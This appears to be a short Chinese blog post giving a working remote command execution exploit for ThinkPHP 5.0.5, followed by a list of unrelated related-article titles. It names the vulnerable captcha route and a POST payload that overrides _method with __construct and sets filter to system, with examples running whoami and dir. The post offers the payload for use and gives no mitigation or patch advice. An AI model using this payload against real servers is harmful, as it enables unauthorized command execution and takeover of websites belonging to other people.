文章目录

  • 前言
  • 访问
  • payload
  • 示例如下

前言

这里的thinkphp版本为5.0.5

访问

http://xx.xx.xx.xx:8080/index.php/?s=captcha

payload

_method=__construct&filter[]=system&method=GET&get[]=系统命令

示例如下

(1)post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行

(2)post传入_method=__construct&filter[]=system&method=GET&get[]=dir进行命令执行

ThinkPHP5.0.5RCE相关推荐

  1. ThinkPHP5.0中Redis的使用和封装(原创)

    Redis是一种常用的非关系型数据库,主要用作数据缓存,数据保存形式为key-value,键值相互映射.它的数据存储跟MySQL不同,它数据存储在内存之中,所以数据读取相对而言很快,用来做高并发非常不 ...

  2. php104.tmp,ThinkPHP5.0多个文件上传后找不到临时文件的修改方法

    这是修改之前的代码 if(!empty($_FILES)){ if(!empty($_FILES[org_positive])){ $org_positive = request()->file ...

  3. ThinkPHP5.0中Redis的使用和封装

    2019独角兽企业重金招聘Python工程师标准>>> Redis是一种常用的非关系型数据库,主要用作数据缓存,数据保存形式为key-value,键值相互映射.它的数据存储跟MySQ ...

  4. thinkphp5.0.9预处理导致的sql注入复现与详细分析

    复现 先搭建thinkphp5.0.9环境 配置下测试环境 然后访问 http://tptest.cc/index.php/index/index/getage?names[0,updatexml(0 ...

  5. Thinkphp5.0快速入门笔记(3)

    学习来源与说明 https://www.kancloud.cn/thinkphp/thinkphp5_quickstart 测试与部署均在windows10下进行学习. 快速入门第三节 获取当前的请求 ...

  6. 修改thinkphp配置nginx服务器,thinkphp5.0配置nginx重写规则

    thinkphp5.0配置nginx重写规则 2018年07月06日 09:29:03阅读数:1529 server { listen 80; #端口号 server_name demo.aa.com ...

  7. 前台模板 海豚php_GitHub - cbw1820446/DolphinPHP: 海豚PHP——快速开发框架(基于ThinkPHP5.0.3)...

    DolphinPHP DophinPHP(海豚PHP)是一个基于ThinkPHP5.0.3开发的一套开源PHP快速开发框架,DophinPHP秉承极简.极速.极致的开发理念,为开发集成了基于数据-角色 ...

  8. php环境搭建sqlserver,ThinkPHP5.0/5.1对接SQLServer数据库(宝塔环境)

    SQLServer实际上是mssql,想要使用thinkphp的Db对象操作数据库前必须要在服务器上安装对应的扩展. 宝塔面板的PHP安装路径为/www/server/php/ 且支持多个PHP版本共 ...

  9. php整合支付宝,Thinkphp5.0整合支付宝在线下单

    thinkphp5.0支付宝在线支付下单整个流程,包括创建订单.支付成功回调更新订单状态.最终跳转到商户订单详情页 查看演示 下载资源: 17 次 下载资源 下载积分: 998 积分 支付宝在线支付控 ...

最新文章

  1. 【Dijkstra算法】未优化版+优先队列优化版
  2. Linux下的软件安装方法介绍
  3. centos7安装python-pip
  4. 【Angular】启动过程
  5. 中石油训练赛 - Isomorphic Inversion(哈希+贪心)
  6. 「SCOI2014」方伯伯的 OJ 解题报告
  7. 再也不用担心无法将中断绑定到多队列网了
  8. python—auto-py-to-exe—.py文件打包成.exe文件最全最详细(用不同的类别做教程)
  9. Binaural Microphone
  10. android大智慧安装目录,大智慧数据文件目录解读
  11. 背景图片自适应屏幕大小CSS写法
  12. 震旦打印机打不开首选项
  13. 音视频开发系列(6)视频码率,帧率和分辨率
  14. 强人工智能和弱人工智能
  15. 爱分享 IE地址栏显示空白?360电脑救援巧修复
  16. 免费PhotoShop—在线版 PhotoPea
  17. 从一个简单的数学题来说说偷换概念引发的催眠效应
  18. 每日一词——@FUnctionalInterface
  19. 七夕情人节表白网站代码 3D流星雨旋转相册 程序员专属情人节表白网站
  20. 纯CSS实现下雪、下雨、落叶效果

热门文章

  1. 如何在IntelliJ IDEA中快速配置Tomcat
  2. Scala入门到精通——第二十四节 高级类型 (三)
  3. 搜索推荐中的召回匹配模型综述(二):基于表示学习的深度学习方法
  4. 构建springmvc+mybatis+dubbo分布式平台-dubbo简介
  5. 老板,年终奖我不要了,请给我一部华为Mate RS保时捷设计手机
  6. 《深入理解Hadoop(原书第2版)》——2.3Hadoop系统的组成
  7. .html(),.text()和.val()的差异总结
  8. Angularjs 如何在 post 请求时去掉因 ng-repeat 产生的 $$hashkey?
  9. 【TensorFlow官方文档】MNIST机器学习入门
  10. 前端 --- 关于DOM的介绍